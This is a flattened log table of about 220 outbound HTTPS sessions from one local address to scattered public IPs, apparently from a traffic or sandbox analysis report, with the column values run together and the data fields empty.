                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11986192.168.2.2343252203.49.249.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11987192.168.2.2350824149.168.56.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11988192.168.2.2338854172.238.124.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11989192.168.2.2342528124.40.27.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11990192.168.2.2359998140.129.27.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11991192.168.2.234173065.122.13.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11992192.168.2.23499405.201.176.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11993192.168.2.2354872107.176.91.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11994192.168.2.233739647.75.123.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11995192.168.2.234345244.253.156.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11996192.168.2.2332904200.27.213.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11997192.168.2.2355960104.8.192.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11998192.168.2.233779650.255.187.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11999192.168.2.2341210134.218.184.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12000192.168.2.2344340114.176.139.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12001192.168.2.2348444150.79.151.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12002192.168.2.2339592110.248.175.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12003192.168.2.2338284106.6.207.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12004192.168.2.234719461.203.61.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12005192.168.2.234830283.48.182.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12006192.168.2.2357084169.116.227.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12007192.168.2.235769669.132.186.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12008192.168.2.233515464.129.120.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12009192.168.2.2357964122.59.119.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12010192.168.2.233843636.209.176.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12011192.168.2.2359042105.46.226.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12012192.168.2.2344834137.132.64.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12013192.168.2.2350130176.105.235.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12014192.168.2.2353476204.133.249.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12015192.168.2.233688045.232.254.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12016192.168.2.234214079.118.221.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12017192.168.2.2339464141.103.187.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12018192.168.2.2339924223.234.209.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12019192.168.2.2336438175.85.22.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12020192.168.2.2346792140.216.17.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12021192.168.2.2352888184.202.202.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12022192.168.2.2347556146.155.113.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12023192.168.2.2354498125.249.135.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12024192.168.2.2346162184.181.209.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12025192.168.2.2354818223.72.197.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12026192.168.2.233877841.94.182.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12027192.168.2.234521691.216.34.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12028192.168.2.2355762110.222.212.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12029192.168.2.2349686142.129.130.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12030192.168.2.2358734157.216.108.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12031192.168.2.235301262.47.54.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12032192.168.2.2345124125.79.5.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12033192.168.2.2351700156.105.194.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12034192.168.2.23563082.97.12.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12035192.168.2.23529601.117.144.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12036192.168.2.2360224135.18.44.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12037192.168.2.2335736186.50.153.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12038192.168.2.2352362206.66.5.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12039192.168.2.2345414120.247.225.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12040192.168.2.235376064.160.33.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12041192.168.2.2336790159.190.191.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12042192.168.2.234108290.176.195.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12043192.168.2.2343620192.162.136.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12044192.168.2.2342648221.16.210.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12045192.168.2.2356974161.36.150.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12046192.168.2.2339280132.4.251.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12047192.168.2.2360422179.203.218.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12048192.168.2.2332966179.141.107.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12049192.168.2.2353868210.45.240.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12050192.168.2.235494239.53.191.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12051192.168.2.2333598121.218.38.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12052192.168.2.2350632202.124.250.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12053192.168.2.2360912109.193.157.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12054192.168.2.2336590106.151.246.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12055192.168.2.2348826130.36.90.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12056192.168.2.235831051.31.236.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12057192.168.2.2338656109.253.0.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12058192.168.2.2358468119.61.93.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12059192.168.2.2336032175.164.67.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12060192.168.2.236093453.238.115.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12061192.168.2.235600890.45.60.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12062192.168.2.235741899.124.9.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12063192.168.2.235958678.240.62.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12064192.168.2.2333224192.20.65.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12065192.168.2.234374049.76.193.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12066192.168.2.234568486.127.150.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12067192.168.2.2349642104.50.125.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12068192.168.2.2342230219.87.78.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12069192.168.2.235306293.124.186.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12070192.168.2.234055269.98.72.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12071192.168.2.233791091.58.182.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12072192.168.2.2335174190.121.154.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12073192.168.2.2342704165.94.139.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12074192.168.2.235436472.186.167.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12075192.168.2.2338454197.40.43.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12076192.168.2.235546667.90.12.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12077192.168.2.2341964212.190.231.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12078192.168.2.2359510166.141.101.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12079192.168.2.2337922150.188.224.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12080192.168.2.2334788130.237.31.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12081192.168.2.2346442111.90.185.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12082192.168.2.234567276.161.32.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12083192.168.2.235071052.87.93.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12084192.168.2.233738247.226.224.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12085192.168.2.235655267.156.195.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12086192.168.2.233795434.133.148.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12087192.168.2.233344891.97.185.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12088192.168.2.235580892.229.89.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12089192.168.2.2348058158.187.221.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12090192.168.2.233672465.246.13.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12091192.168.2.234990065.102.7.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12092192.168.2.2359872208.81.250.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12093192.168.2.2355434176.118.11.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12094192.168.2.2341220125.72.68.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12095192.168.2.235994480.201.134.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12096192.168.2.234211879.81.244.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12097192.168.2.235883486.202.128.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12098192.168.2.234566272.178.99.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12099192.168.2.2341788173.78.238.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12100192.168.2.2358944211.42.216.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12101192.168.2.2345384145.130.19.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12102192.168.2.234046478.210.71.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12103192.168.2.2358176193.94.145.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12104192.168.2.2346946107.183.216.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12105192.168.2.2349858105.25.19.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12106192.168.2.2341772114.226.206.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12107192.168.2.2338172171.90.120.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12108192.168.2.2348332145.167.5.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12109192.168.2.234786477.217.15.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12110192.168.2.2342660132.4.241.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12111192.168.2.2355486148.137.133.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12112192.168.2.233718289.162.144.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12113192.168.2.2358968164.202.104.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12114192.168.2.2333866219.180.58.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12115192.168.2.2345800169.6.83.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12116192.168.2.2346082111.100.190.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12117192.168.2.2353464181.73.2.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12118192.168.2.233322667.139.21.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12119192.168.2.2352728193.160.53.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12120192.168.2.2347994170.111.240.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12121192.168.2.2344262130.193.22.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12122192.168.2.2346382201.114.40.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12123192.168.2.233279069.133.109.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12124192.168.2.2345426121.234.59.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12125192.168.2.235265864.75.246.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12126192.168.2.234032259.182.110.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12127192.168.2.234425064.175.20.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12128192.168.2.2339282159.70.209.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12129192.168.2.23363644.161.253.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12130192.168.2.234164485.208.253.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12131192.168.2.233405219.168.45.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12132192.168.2.234862488.250.233.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12133192.168.2.2349050105.218.167.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12134192.168.2.235263858.97.241.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12135192.168.2.2355904151.239.238.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12136192.168.2.2345424220.175.158.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12137192.168.2.2333976193.212.182.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12138192.168.2.2346628126.7.67.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12139192.168.2.2344418145.77.248.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12140192.168.2.2359142146.169.169.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12141192.168.2.233618832.243.224.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12142192.168.2.2342086140.60.16.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12143192.168.2.233475817.237.242.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12144192.168.2.2347124162.19.58.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12145192.168.2.2336600169.144.167.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12146192.168.2.2350246141.38.107.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12147192.168.2.2337774167.231.32.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12148192.168.2.2347742180.190.178.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12149192.168.2.2360418137.90.254.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12150192.168.2.23579381.70.188.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12151192.168.2.2339790146.11.125.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12152192.168.2.2338650106.5.129.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12153192.168.2.2353686212.107.82.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12154192.168.2.23366288.90.170.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12155192.168.2.2354902190.97.32.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12156192.168.2.2350274180.36.61.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12157192.168.2.2358088176.35.233.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12158192.168.2.2350892187.254.245.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12159192.168.2.234259479.253.18.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12160192.168.2.233587614.51.62.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12161192.168.2.2347150111.106.179.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12162192.168.2.234769093.97.47.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12163192.168.2.234121619.173.207.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12164192.168.2.234585675.244.234.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12165192.168.2.2352760157.50.129.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12166192.168.2.235850417.149.104.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12167192.168.2.2333526130.5.36.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12168192.168.2.234072041.0.191.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12169192.168.2.235637441.53.106.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12170192.168.2.2342146152.23.62.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12171192.168.2.233821459.253.146.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12172192.168.2.234915296.189.196.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12173192.168.2.235870039.65.246.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12174192.168.2.2358374145.157.129.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12175192.168.2.234197659.129.96.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12176192.168.2.2339342107.63.136.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12177192.168.2.2358664180.117.61.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12178192.168.2.2357906222.98.94.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12179192.168.2.2352234176.27.228.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12180192.168.2.2356342223.1.192.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12181192.168.2.2360972207.231.23.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12182192.168.2.2333820121.111.199.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12183192.168.2.234911652.178.234.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12184192.168.2.235359854.204.8.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12185192.168.2.233403479.242.215.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12186192.168.2.2342584196.17.129.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12187192.168.2.2349376191.71.190.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12188192.168.2.233509266.246.183.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12189192.168.2.2341184198.116.68.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12190192.168.2.234500063.217.118.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12191192.168.2.235122014.166.185.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12192192.168.2.233413654.96.7.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12193192.168.2.234023886.177.45.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12194192.168.2.234456246.44.45.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12195192.168.2.233486048.79.98.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12196192.168.2.234212225.184.73.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12197192.168.2.2355280170.13.226.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12198192.168.2.2347966160.87.133.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12199192.168.2.2356404195.48.195.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12200192.168.2.2334240110.211.3.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12201192.168.2.234092073.120.57.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12202192.168.2.235698851.203.168.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12203192.168.2.2342770112.73.210.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12204192.168.2.2347288186.26.59.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12205192.168.2.2343370190.123.13.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12206192.168.2.234411464.80.166.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12207192.168.2.234224242.68.228.12443
